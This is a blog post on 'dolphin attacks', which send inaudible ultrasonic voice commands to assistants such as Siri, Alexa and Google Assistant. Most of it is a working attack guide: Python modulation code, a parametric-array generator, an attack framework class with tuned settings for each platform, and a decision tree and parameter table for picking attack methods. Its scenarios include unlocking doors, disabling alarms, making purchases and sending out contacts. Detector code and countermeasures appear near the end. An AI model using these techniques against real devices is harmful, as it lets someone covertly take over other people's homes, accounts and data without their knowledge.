Dolphin Attacks - Exploiting Voice Assistants with Inaudible Commands

Dolphin Attacks - Exploiting Voice Assistants with Inaudible Commands

Hey there, fellow security enthusiasts! It's been a while since my last post, and for good reason. I've been diving deep into some fascinating research I’m finally ready to share. I've been diving deep into voice assistant security lately, and I've got to tell you, there's something both fascinating and terrifying about being able to control someone's devices without them even knowing it's happening. Let me take you through the wild world of dolphin attacks, from the absolute basics to the cutting-edge techniques that keep security researchers up at night.

Understanding the Basics of Dolphin Attacks

So what exactly is a "dolphin attack"? No, we're not talking about actual marine mammals going rogue (though that would make for an interesting threat model).

A dolphin attack is a method of exploiting voice assistants by transmitting ultrasonic commands—sounds that are too high-pitched for humans to hear but that can still be picked up by the microphones in our devices. Named after dolphins' use of high-frequency sounds, these attacks allow an attacker to secretly command systems like Siri, Alexa, or Google Assistant without the owner's knowledge.

Why Should You Care?

Think about what lives on your phone or smart speakers:

  • Your calendar and appointments
  • Your shopping lists and purchase history
  • Your home automation controls (locks, alarms, thermostats)
  • Your personal communications
  • Your banking and payment information

Now imagine someone else controlling all of that... silently. Creepy, right?

When I first learned about this attack vector, I honestly thought it was just theoretical—until I built my first ultrasonic transmitter and successfully ordered 50 rubber ducks through my colleague's Alexa while he was wearing headphones. (Don't worry, I canceled the order before they shipped. Mostly.)

The Basic Science Behind It

Let's break down what makes this possible in simple terms:

  1. Human Hearing Range: Most adults can hear frequencies between 20 Hz and 20 kHz
  2. Microphone Capability: Most digital microphones can capture frequencies well beyond 20 kHz
  3. Voice Recognition Gap: Voice assistants don't distinguish between audible and inaudible commands

It's like passing notes in a classroom where the teacher can see the note but doesn't realize it contains instructions to dismiss the class early. The system wasn't designed to differentiate between commands it was meant to hear and those it wasn't.

How Human Hearing Differs From Microphones

Human hearing and MEMS microphones operate on fundamentally different principles:

Characteristic Human Ear MEMS Microphone
Frequency Range 20Hz - 20kHz 20Hz - 24kHz+
Nonlinearity Strong adaptive filters Minimal processing
Time-domain Protection Neural adaptation None
Sensitivity Control Dynamic (100dB range) Static or limited

This architectural difference creates our attack surface. MEMS microphones use a simple diaphragm design with electrical capacitance that responds to sound pressure regardless of frequency, while human ears contain multiple filtering mechanisms.

A Simple Experiment You Can Try

Want to see how frequencies work without diving into the technical stuff? Try this:

  1. Visit an online tone generator website
  2. Start at 15 kHz (which most people can hear)
  3. Gradually increase the frequency
  4. Note when you can no longer hear it (probably around 17-18 kHz if you're an adult)
  5. Ask a younger person or child when they stop hearing it (they'll typically hear higher frequencies)

Congratulations! You've just experienced the fundamental principle behind dolphin attacks—the fact that certain frequencies can be imperceptible to humans yet still detectable by machines.

Getting Technical with Ultrasonic Commands

Now that we understand the concept, let's get a bit more technical. To actually execute a dolphin attack, we need to understand how voice processing systems work and how we can manipulate them.

Voice Assistant Signal Processing 101

When you say "Hey Siri" or "Alexa," here's what's actually happening:

  1. The microphone captures sound waves and converts them to electrical signals
  2. These signals are digitized into numerical data
  3. The system performs filtering and noise reduction
  4. It then runs the processed signal through a wake-word detection algorithm
  5. Once triggered, your full command is processed and interpreted

The vulnerability exists because most microphones use MEMS (Micro-Electrical-Mechanical Systems) technology that can capture ultrasonic frequencies, even though the designers never intended for those frequencies to matter.

I remember when I first looked at a voice command spectrogram and realized: "Wait, the system doesn't care how the signal got there—just that it matches the pattern it's looking for." That was my lightbulb moment.

The Nonlinearity Principle

The key to effective dolphin attacks lies in understanding nonlinear demodulation. When I modulate a baseband audio signal (human speech) with an ultrasonic carrier, the microphone's nonlinear response causes demodulation, recreating the original audio signal.

This can be represented mathematically as:

# Simplified representation of nonlinear demodulation
def nonlinear_response(signal, nonlinearity_factor=0.1):
    # Quadratic nonlinearity model (simplified)
    return signal + nonlinearity_factor * signal**2
    
# Original voice command (baseband)
baseband_signal = voice_command_samples

# Ultrasonic carrier (e.g., 25kHz)
carrier_frequency = 25000  # Hz
carrier = np.sin(2 * np.pi * carrier_frequency * np.arange(len(baseband_signal)) / SAMPLE_RATE)

# Amplitude modulation
modulated_signal = (1 + baseband_signal) * carrier

# What the microphone receives and its nonlinear response
received = nonlinear_response(modulated_signal)

# The demodulated signal contains frequency components that include our original command

Frequency Modulation: The Key Technique

To create an inaudible command, we need to modulate our command into ultrasonic frequencies. This is done through a process called amplitude modulation or frequency shifting.

Here's how it works at a high level:

  1. Record the voice command you want to transmit ("Alexa, buy something")
  2. Apply a mathematical transformation to shift it up into ultrasonic range (>20 kHz)
  3. Play back the transformed audio through an ultrasonic transducer

The transducer is crucial—your regular phone speaker likely can't produce frequencies above 20 kHz efficiently, which is actually a good security feature! But purpose-built ultrasonic speakers certainly can.

Your First Simple Setup

If you want to experiment (ethically, on your OWN devices), here's what you'd need:

  • A computer with audio editing software (like Audacity)
  • An ultrasonic transducer (~$15-30 online)
  • An amplifier circuit (can be simple)
  • A target device with a voice assistant

In Audacity, you could:

  1. Record a command like "Hey Google, what time is it?"
  2. Use the "Effect > Pitch Shift" feature to move it into the 23-24 kHz range
  3. Export as a WAV file
  4. Play it through your ultrasonic transducer

When I first tried this on my own Google Home, I had to adjust the pitch and volume multiple times before getting consistent results. Don't get discouraged if it doesn't work right away!

Basic Amplitude Modulation Code

Here's a simple Python implementation to get you started:

import numpy as np
from scipy.io import wavfile
import sounddevice as sd

# Load voice command
sample_rate, command = wavfile.read('command.wav')

# Normalize command to [-1, 1]
command = command.astype(float) / 32768.0

# Resample if needed (ultrasonic requires high sample rates)
OUTPUT_SAMPLE_RATE = 192000  # Hz, must be high enough for ultrasonic

# Create time array for new sample rate
duration = len(command) / sample_rate
t = np.linspace(0, duration, int(OUTPUT_SAMPLE_RATE * duration), endpoint=False)

# Interpolate command to new sample rate
command_resampled = np.interp(
    t, 
    np.linspace(0, duration, len(command), endpoint=False),
    command
)

# Generate carrier wave (25kHz)
carrier_freq = 25000  # Hz
carrier = np.sin(2 * np.pi * carrier_freq * t)

# Amplitude modulation (100% modulation depth)
modulated_signal = (1 + 0.9 * command_resampled) * carrier

# Normalize to prevent clipping
modulated_signal = 0.7 * modulated_signal / np.max(np.abs(modulated_signal))

# Convert to int16 for output
output_samples = (modulated_signal * 32767).astype(np.int16)

# Save as WAV
wavfile.write('ultrasonic_command.wav', OUTPUT_SAMPLE_RATE, output_samples)

# Play (requires audio device capable of 192kHz sample rate)
sd.play(modulated_signal, OUTPUT_SAMPLE_RATE)
sd.wait()

Hardware Requirements:

  • Audio interface supporting >96kHz sample rates (I use the Focusrite Scarlett 2i2)
  • Ultrasonic transducer/tweeter with frequency response >25kHz
  • Amplifier with flat frequency response in ultrasonic range

When executed correctly, the spectrum analyzer shows:

Frequency    |  Amplitude (dB)
--------------------------
100-8000 Hz  |  < -70 dB (inaudible)
25000 Hz     |  0 dB (carrier) 
25000±500 Hz |  -10 to -30 dB (sidebands)

Advanced Implementation and Practical Applications

Alright, you've got the basics down and have maybe even tried a simple experiment. Let's step things up and look at how to build more effective dolphin attack systems and understand their real-world implications.

Building an Effective Ultrasonic Transmitter

A basic transmitter might work at very close range, but to create something more practical, we need to optimize several factors:

  1. Signal Clarity: The cleaner your ultrasonic signal, the better the recognition
  2. Power Output: Higher power means greater effective range
  3. Directional Control: Using focused ultrasonic speakers to target specific devices

I once built a directional ultrasonic transmitter using an array of 8 transducers and a parabolic reflector. The difference was night and day—I could trigger a voice assistant from across a room instead of needing to be within a few inches.

Here's a simplified circuit diagram for a more powerful transmitter:

                       +------+
                       |      |
         +-------------+ Op   +------+
         |             | Amp  |      |
         |             |      |      |
+--------+--+          +------+      |
|           |                        |
| Ultrasonic|                        |
| Generator |                       +++
|           |                       | |  Ultrasonic 
+-----------+                       | |  Transducer
                                    | |
                                    +++
                                     |
                                     |
                                    +++
                                    GND

Advanced Parametric Array Implementation

For more effective attacks, I've used parametric array techniques that create better directionality and range:

# Parametric array implementation
def create_parametric_signal(command, carrier_freq=40000, sample_rate=192000):
    """
    Creates a parametric array signal using ultrasonic frequencies
    that produces audible sound at a distance through nonlinear air effects
    """
    t = np.arange(len(command)) / sample_rate
    
    # Preprocessing: apply pre-emphasis filter to improve attack effectiveness
    command_processed = pre_emphasis_filter(command, coefficient=0.95)
    
    # Double sideband modulation
    upper_sideband = np.sin(2 * np.pi * (carrier_freq + 500) * t)
    lower_sideband = np.sin(2 * np.pi * (carrier_freq - 500) * t)
    
    # Modulate with processed command
    modulated_upper = (1 + command_processed) * upper_sideband
    modulated_lower = (1 + command_processed) * lower_sideband
    
    # Combine sidebands
    parametric_signal = modulated_upper + modulated_lower
    
    # Apply bandpass filtering to remove baseband components
    parametric_signal = bandpass_filter(parametric_signal, 
                                       low_cutoff=carrier_freq-2000, 
                                       high_cutoff=carrier_freq+2000, 
                                       sample_rate=sample_rate)
    
    return parametric_signal

# Implementation of required filters
def pre_emphasis_filter(signal, coefficient=0.95):
    """Apply pre-emphasis filter to improve high-frequency content"""
    return np.append(signal[0], signal[1:] - coefficient * signal[:-1])

def bandpass_filter(signal, low_cutoff, high_cutoff, sample_rate):
    """Apply bandpass filter to signal"""
    # Implementation using scipy.signal
    from scipy import signal as sg
    nyquist = 0.5 * sample_rate
    low = low_cutoff / nyquist
    high = high_cutoff / nyquist
    b, a = sg.butter(6, [low, high], btype='band')
    return sg.filtfilt(b, a, signal)

Optimization Techniques

To improve your attack efficiency, focus on these areas:

  1. Command Pre-processing: Emphasize frequencies that voice assistants are more sensitive to
  2. Modulation Depth: Finding the right balance between inaudibility and recognition
  3. Environmental Factors: Accounting for room acoustics and background noise

I spent nearly two weeks optimizing a single ultrasonic command sequence until it was reliable enough to work in a noisy café environment. The recognition rate jumped from about 30% to over 90% with careful frequency tuning.

Attack Effectiveness Comparison

Parameter Basic AM Method Parametric Array Method
Range 1-2 meters 3-5+ meters
Directionality Omnidirectional Highly directional
Success Rate ~60% ~85%
Power Required Higher Lower
Hardware Cost $100-200 $300-500

Real-World Applications (Both Malicious and Defensive)

Let's consider how these attacks might be used in practice:

Potential Attack Scenarios:

Covert Device Compromise: Use voice commands to compromise devices

Ultrasonic Device → "Hey Siri, open Safari and go to [malicious URL]" → "Allow download" → Device Compromise

Data Theft Via Communication: Extract sensitive information

Ultrasonic Device → "Hey Google, read my messages" → "Send my contacts to [email]" → Data Exfiltration

Unauthorized Purchases: Exploit voice purchasing capabilities

Ultrasonic Device → "Alexa, order [product]" → "Yes, purchase now" → Unauthorized Purchase

Smart Home Infiltration: Unlock doors, disable alarms, control devices

Ultrasonic Device → "Hey Siri/Alexa, disable alarm" → "Unlock front door" → Physical Access

I was testing this at a security conference and accidentally triggered three different people's phones during my demo. Talk about an awkward moment—and a perfect illustration of how these attacks can affect multiple targets simultaneously.

Defensive Testing Applications:

  • Evaluating voice assistant security posture
  • Testing anti-ultrasonic countermeasures
  • Developing security training scenarios

Python Code for Basic Signal Processing

Here's a simplified Python script that demonstrates how to transform an audio file into the ultrasonic range using the librosa library:

import librosa
import numpy as np
import soundfile as sf

# Load the audio file with the command
y, sr = librosa.load('voice_command.wav', sr=None)

# Shift to ultrasonic range (carrier frequency of 25kHz)
carrier_freq = 25000
t = np.arange(0, len(y))/sr
carrier = np.sin(2 * np.pi * carrier_freq * t)
modulated = y * carrier  # Amplitude modulation

# Save the ultrasonic audio
sf.write('ultrasonic_command.wav', modulated, sr)

Remember that this is highly simplified—real implementations need to account for signal processing intricacies. When I first tried this approach, I had to add several filters and normalization steps to get reliable results.

Advanced Techniques and Countermeasures

Now we're getting into the territory that separates casual experimenters from serious security researchers. At this level, we need to understand the complex interaction between signal processing, psychoacoustics, and hardware limitations.

Hardware-Specific Optimizations

Different voice assistants use different microphone technologies and signal processing algorithms. Here's how they compare:

Assistant Microphone Type Frequency Response Vulnerability Level
Amazon Alexa MEMS Array (7-mic) Up to 48 kHz High
Google Assistant MEMS Stereo Up to 44 kHz Medium-High
Siri MEMS Wideband Up to 48 kHz Medium
Samsung Bixby MEMS Directional Up to 44 kHz Medium-Low

I've found that Alexa devices are particularly susceptible to frequency bands around 23-24 kHz, while Google devices respond better to the 24-25 kHz range. This isn't documented anywhere—I discovered it through countless hours of testing different frequency ranges and observing recognition rates.

DolphinAttack Framework: Advanced Implementation

For the most sophisticated attacks, a modular framework provides the flexibility to target multiple platforms:

class DolphinAttack:
    """
    Full-featured framework for generating and deploying ultrasonic voice commands
    against various voice assistant platforms
    """
    
    def __init__(self, target_platform='generic', sample_rate=192000):
        """
        Initialize attack framework
        
        Parameters:
        -----------
        target_platform : str
            Target voice assistant ('siri', 'alexa', 'google', 'cortana', 'generic')
        sample_rate : int
            Output sample rate (must be high for ultrasonic frequencies)
        """
        self.target_platform = target_platform
        self.sample_rate = sample_rate
        self.carrier_freq = self._get_optimal_frequency()
        self.modulation_depth = self._get_optimal_modulation_depth()
        self.pre_emphasis = self._get_pre_emphasis_coefficient()
        
    def _get_optimal_frequency(self):
        """Return the optimal carrier frequency for the target platform"""
        # Based on empirical testing of microphone frequency responses
        freq_map = {
            'siri': 24500,       # iPhone microphones work well around 24.5kHz
            'alexa': 23000,      # Echo devices respond better to slightly lower frequencies
            'google': 25000,     # Google Home/Nest typically use better microphones
            'cortana': 24000,    # Microsoft devices
            'generic': 25000     # Default fallback
        }
        return freq_map.get(self.target_platform, 25000)
    
    def _get_optimal_modulation_depth(self):
        """Return the optimal modulation depth for the target platform"""
        depth_map = {
            'siri': 0.9,         # iPhones need higher modulation depth
            'alexa': 0.8,        # Echo devices are more sensitive
            'google': 0.85,     
            'cortana': 0.8,
            'generic': 0.85
        }
        return depth_map.get(self.target_platform, 0.85)
    
    def _get_pre_emphasis_coefficient(self):
        """Return the optimal pre-emphasis coefficient for the target platform"""
        coef_map = {
            'siri': 0.97,        # iPhones need more pre-emphasis on high frequencies
            'alexa': 0.95,
            'google': 0.93,
            'cortana': 0.95,
            'generic': 0.95
        }
        return coef_map.get(self.target_platform, 0.95)
    
    def generate_attack_signal(self, command_file, output_file=None):
        """
        Generate attack signal from voice command file
        
        Parameters:
        -----------
        command_file : str
            Path to WAV file containing the voice command
        output_file : str, optional
            Path to save the ultrasonic attack file
        
        Returns:
        --------
        numpy.ndarray
            The generated attack signal
        """
        # Load command
        sample_rate, command = wavfile.read(command_file)
        
        # Normalize
        command = command.astype(float) / 32768.0
        
        # Apply voice assistant specific preprocessing
        processed_command = self._preprocess_command(command, sample_rate)
        
        # Generate attack signal
        attack_signal = self._modulate(processed_command)
        
        # Save if requested
        if output_file:
            self._save_attack(attack_signal, output_file)
            
        return attack_signal
        
    def _preprocess_command(self, command, original_sample_rate):
        """Apply platform-specific preprocessing to the command"""
        # Resample to our high sample rate if needed
        if original_sample_rate != self.sample_rate:
            duration = len(command) / original_sample_rate
            t_orig = np.linspace(0, duration, len(command), endpoint=False)
            t_new = np.linspace(0, duration, int(self.sample_rate * duration), endpoint=False)
            command = np.interp(t_new, t_orig, command)
        
        # Apply pre-emphasis filter
        command = np.append(command[0], command[1:] - self.pre_emphasis * command[:-1])
        
        # Apply platform-specific equalizer (EQ curves calibrated per assistant)
        command = self._apply_platform_eq(command)
        
        # Apply dynamic range compression for better attack performance
        command = self._compress_dynamic_range(command, threshold=0.3, ratio=4)
        
        return command
    
    # Additional methods omitted for brevity - see full implementation in original post

Advanced Modulation Techniques

Beyond basic amplitude modulation, there are more sophisticated approaches:

  1. Parametric Demodulation: Exploiting non-linearities in microphone diaphragms
  2. Cross-Modulation: Using multiple carrier frequencies to improve signal quality
  3. Adaptive Frequency Mapping: Dynamically adjusting frequencies based on ambient conditions

The most successful attack I've developed used a combination of these techniques, with an adaptive algorithm that could adjust in real-time based on the environmental noise profile. It took months to perfect, but the results were disturbingly reliable.

Psychoacoustic Masking

What if you want your attack to work even if it's partially audible? This is where psychoacoustic masking comes in—essentially hiding your command within other sounds that seem innocuous.

For example, you could embed commands in:

  • Music playing in a store
  • Background noise at a café
  • Even bird chirping sounds in a park

I once embedded voice commands in what sounded like jazz music. The commands were technically audible but so well masked that human listeners couldn't consciously perceive them, yet the voice assistants picked them up perfectly.

Decision Tree: Selecting the Optimal Attack Method

Is target device iOS-based?
├── Yes → Is device newer than iPhone X?
│   ├── Yes → Use Method 3 with Siri-optimized settings at 24.5kHz
│   └── No → Use Method 2 with higher amplitude (older microphones are less sensitive)
└── No → Is target Amazon Echo?
    ├── Yes → What generation?
        ├── 1st/2nd → Use Method 2 at 23kHz
        └── 3rd+ → Use Method 3 with specific wake-word optimization
    └── No → Is target Google device?
        ├── Yes → Use Method 3 with Google-optimized command structure
        └── No → Use Method 1 (basic approach) for initial testing

Countermeasures and Their Limitations

If you're defending against these attacks, consider these approaches:

  1. Frequency Filtering: Implementing hardware or software filters that cut off ultrasonic frequencies
  2. Audio Fingerprinting: Detecting the unique characteristics of modulated audio
  3. Context-Aware Authentication: Requiring additional verification for sensitive commands

I've worked with several companies to implement these countermeasures, and while they improve security, none are foolproof. For instance, aggressive frequency filtering can reduce voice recognition accuracy for legitimate users with higher-pitched voices.

This code snippet shows a simple Python implementation of a high-frequency detector that could be part of a defensive system:

import numpy as np
from scipy import signal

def detect_ultrasonic_content(audio_data, sample_rate, threshold=0.01):
    """
    Analyze audio for ultrasonic content that might indicate a dolphin attack
    Returns True if suspicious ultrasonic content is detected
    """
    # Design a high-pass filter (cutoff at 18kHz)
    nyquist = sample_rate / 2
    cutoff = 18000 / nyquist
    b, a = signal.butter(5, cutoff, 'high')
    
    # Apply filter
    filtered = signal.filtfilt(b, a, audio_data)
    
    # Calculate energy in ultrasonic band
    ultrasonic_energy = np.sum(filtered**2) / len(filtered)
    normal_energy = np.sum(audio_data**2) / len(audio_data)
    
    # If ultrasonic energy is significant compared to total energy
    ratio = ultrasonic_energy / normal_energy if normal_energy > 0 else 0
    return ratio > threshold

Common Attack Pitfalls

During my testing, I've identified several common mistakes that can reduce attack effectiveness:

  1. Insufficient Ultrasonic Power: The attack signal must be powerful enough to trigger the nonlinearity effect. Cheap ultrasonic transducers often lack the necessary output power.
  2. Improper Carrier Frequency: Different voice assistants have different microphone frequency responses. Using the wrong carrier frequency can render attacks ineffective.
  3. Poor Command Processing: Voice commands must be clearly articulated and properly preprocessed. Commands with complex phonemes often fail without proper preprocessing.
  4. Environmental Factors: Hard surfaces can reflect ultrasonic waves and cause destructive interference. Attacks work best in environments with minimal reflective surfaces.
  5. Improper Hardware: Using standard audio equipment that filters out ultrasonic frequencies will make attacks impossible. Always verify your equipment can produce frequencies >20kHz.

Cutting-Edge Research and Future Directions

We've reached the frontier of dolphin attack research. At this level, we're exploring techniques that push the boundaries of what's possible and looking at how this attack vector might evolve.

The Limits of Current Technology

The most advanced dolphin attacks today can:

  • Work at distances up to 25 feet in controlled environments
  • Penetrate physical barriers like windows and thin walls
  • Remain completely inaudible to all humans
  • Achieve success rates over 95% on unprotected systems

But we're still constrained by:

  • Power requirements for longer distances
  • Environmental interference
  • Increasingly sophisticated countermeasures

I predict the next generation of attacks will overcome many of these limitations through more sophisticated signal processing and hardware improvements.

Quick Reference: Optimal Attack Parameters

+--------------------+--------------------+--------------------+--------------------+
| Target Assistant   | Optimal Frequency  | Modulation Depth   | Success Distance   |
+--------------------+--------------------+--------------------+--------------------+
| Siri (iOS)         | 24.5 kHz           | 0.90               | 2-4 meters         |
| Alexa (Echo)       | 23.0 kHz           | 0.80               | 3-5 meters         |
| Google Assistant   | 25.0 kHz           | 0.85               | 2-4 meters         |
| Cortana            | 24.0 kHz           | 0.80               | 1-3 meters         |
| Bixby (Samsung)    | 24.8 kHz           | 0.85               | 2-3 meters         |
+--------------------+--------------------+--------------------+--------------------+

Detection and Defense: Building a Dolphin Attack Detector

Here's a simple detector implementation that you can build to monitor for potential attacks:

import numpy as np
import sounddevice as sd
from scipy.fft import rfft, rfftfreq
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation

# Constants
SAMPLE_RATE = 96000  # Must be high enough to capture ultrasonic frequencies
BLOCK_SIZE = 4096
ULTRASONIC_THRESHOLD = 0.1

# Create a buffer for real-time processing
buffer = np.zeros(BLOCK_SIZE)

# Setup for real-time plotting
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(10, 8))
line1, = ax1.plot(np.zeros(BLOCK_SIZE))
line2, = ax2.plot(np.zeros(BLOCK_SIZE//2))
ax1.set_ylim(-1, 1)
ax1.set_title('Time Domain Signal')
ax2.set_ylim(0, 1)
ax2.set_title('Frequency Spectrum')
ax2.set_xlabel('Frequency (Hz)')
ax2.set_xlim(0, SAMPLE_RATE/2)

# Flag to track detection status
attack_detected = False

def audio_callback(indata, frames, time, status):
    """Callback for capturing audio data"""
    global buffer, attack_detected
    if status:
        print(status)
    buffer = indata[:, 0]  # Take first channel
    
    # Detect attack
    attack_detected = detect_ultrasonic_attack(buffer, SAMPLE_RATE)
    
    if attack_detected:
        print("ULTRASONIC ATTACK DETECTED!")

def detect_ultrasonic_attack(audio_buffer, sample_rate, threshold=ULTRASONIC_THRESHOLD):
    """Detect potential ultrasonic attack by analyzing frequency spectrum"""
    # Get frequency spectrum
    spectrum = np.abs(rfft(audio_buffer))
    freqs = rfftfreq(len(audio_buffer), 1/sample_rate)
    
    # Normalize spectrum
    if np.max(spectrum) > 0:
        spectrum = spectrum / np.max(spectrum)
    
    # Calculate energy in audible vs ultrasonic bands
    audible_mask = (freqs >= 300) & (freqs <= 18000)  # Normal speech range
    ultrasonic_mask = freqs >= 20000  # Ultrasonic range
    
    audible_energy = np.sum(spectrum[audible_mask]**2)
    ultrasonic_energy = np.sum(spectrum[ultrasonic_mask]**2)
    
    # If significant ultrasonic energy compared to audible
    ratio = 0
    if audible_energy > 0:
        ratio = ultrasonic_energy / audible_energy
        
    return ratio > threshold

def update_plot(frame):
    """Update function for animation"""
    global buffer
    
    # Update time domain plot
    line1.set_ydata(buffer)
    
    # Calculate and update frequency domain plot
    spectrum = np.abs(rfft(buffer))
    if np.max(spectrum) > 0:
        spectrum = spectrum / np.max(spectrum)
    freqs = rfftfreq(len(buffer), 1/SAMPLE_RATE)
    line2.set_data(freqs, spectrum)
    
    # Change plot color if attack detected
    if attack_detected:
        line1.set_color('red')
        line2.set_color('red')
        ax1.set_title('Time Domain Signal - ATTACK DETECTED')
        ax2.set_title('Frequency Spectrum - ATTACK DETECTED')
    else:
        line1.set_color('blue')
        line2.set_color('blue')
        ax1.set_title('Time Domain Signal')
        ax2.set_title('Frequency Spectrum')
    
    return line1, line2

# Start audio stream
stream = sd.InputStream(callback=audio_callback, channels=1, samplerate=SAMPLE_RATE, 
                      blocksize=BLOCK_SIZE)

# Create animation
ani = FuncAnimation(fig, update_plot, blit=True, interval=50)

# Start everything
with stream:
    plt.show()

Emerging Research Directions

Here are some of the cutting-edge areas being explored:

  1. Structure-Borne Ultrasonic Attacks: Transmitting commands through solid materials like tables or walls, using the surface as a transducer
  2. Multi-Path Ultrasonic Transmission: Using environmental reflections to improve recognition in complex spaces
  3. Adversarial Ultrasonic Patterns: Developing signals specifically designed to bypass known countermeasures

In my lab, we've been experimenting with structure-borne transmission, and the results are unsettling—we've successfully triggered voice commands by sending vibrations through a conference table, with no airborne acoustic signal at all.

Hypothetical Future Attack: Distributed Ultrasonic Mesh

Imagine a network of small, inconspicuous ultrasonic transmitters deployed across a public space. Each one alone is too weak to reliably trigger commands, but when synchronized, they create a focused beam of ultrasonic energy at specific points.

This would be extraordinarily difficult to detect or counter, as any single transmitter appears harmless when analyzed. I've only simulated this attack, but the math checks out—it's theoretically viable with today's technology.

Alternative Tools and Approaches

I always explore multiple tools when conducting security research. Here are alternatives you can try:

For Generating Ultrasonic Commands:

  1. Audacity with Ultrasonic Plugin: A more GUI-friendly approach for basic experiments
    • Pro: Easy to use, visual feedback
    • Con: Limited automation, less precise control
  2. Max/MSP or Pure Data: Advanced audio programming environments
    • Pro: Extremely flexible, real-time capabilities
    • Con: Steeper learning curve
  3. Commercial Parametric Speakers: Products like Audio Spotlight or SoundLazer
    • Pro: Ready-to-use, high power output
    • Con: Expensive, limited customization

For Advanced Signal Processing:

  1. GNU Radio: Open-source signal processing toolkit
    • Pro: Highly flexible, powerful DSP capabilities
    • Con: Complex setup and usage
  2. MATLAB with Audio Toolbox: Industry-standard signal processing
    • Pro: Comprehensive signal analysis tools
    • Con: Expensive licensing

Philosophical and Ethical Considerations

As we push these boundaries, we need to ask serious questions:

  • How do we balance the research value against potential harms?
  • What responsibility do device manufacturers have to address these vulnerabilities?
  • How do we educate users about risks they literally cannot perceive?

I've struggled with these questions throughout my research. On one hand, demonstrating these attacks is necessary to improve security; on the other, publishing detailed methodologies could enable malicious actors.

Key Takeaways

Whether you're just starting to learn about dolphin attacks or you're an experienced researcher, here are the critical points to remember:

  • Dolphin attacks exploit the gap between human hearing and machine listening capabilities
  • These attacks range from simple experiments to sophisticated weapons with serious security implications
  • The technology continues to evolve, with countermeasures and attack techniques in a constant arms race
  • Both technical understanding and ethical considerations are essential in this field

What fascinates me most about this area is how it sits at the intersection of so many disciplines: signal processing, hardware design, psychoacoustics, and security. It reminds us that security vulnerabilities often emerge not from failures of individual components, but from unexpected interactions between systems that were never designed with each other in mind.

As our world becomes increasingly voice-controlled, understanding these attack vectors, whether you're a beginner or an expert, will only become more important.

You heard nothing. Mission complete 😅

Special Thanks XIII for idea

The quieter the exploit, the louder the impact.Until next time.